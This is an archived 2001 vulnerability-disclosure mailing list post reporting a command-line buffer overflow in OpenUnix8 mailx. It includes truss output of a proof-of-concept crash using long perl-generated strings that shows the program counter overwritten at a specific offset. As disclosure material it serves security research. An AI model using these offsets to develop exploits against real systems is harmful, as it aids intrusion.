OpenUnix8 mailx command line overflow
From: dotslash@snosoft.comDate: 10/21/01
- Previous message: Blue Boar: "Dead Thread 0-Day/$1000"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 21 Oct 2001 12:52:10 -0700 Subject: OpenUnix8 mailx command line overflow From: dotslash@snosoft.com To: vuln-dev@security-focus.com Message-Id: <1DA09243-C65D-11D5-9592-00039305969A@snosoft.com>
>
> /bin/mail is a symlink to mailx. mailx is not suid however it suffers
> from a common buffer overflow
> -KF
>
> # truss mail `perl -e 'print "A" x 5122'`
> execve("/bin/mail", 0x08045F18, 0x08045F24) argc = 2
> open("//.mailrc", O_RDONLY, 0666) Err#2 ENOENT
> Incurred fault #6, FLTBOUNDS %pc = 0x202C4141
> siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
> Received signal #11, SIGSEGV [default]
> siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
> *** process killed ***
> # truss mail `perl -e 'print "A" x 5124'`
> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
> Received signal #11, SIGSEGV [default]
> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
> *** process killed ***
>
- Previous message: Blue Boar: "Dead Thread 0-Day/$1000"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
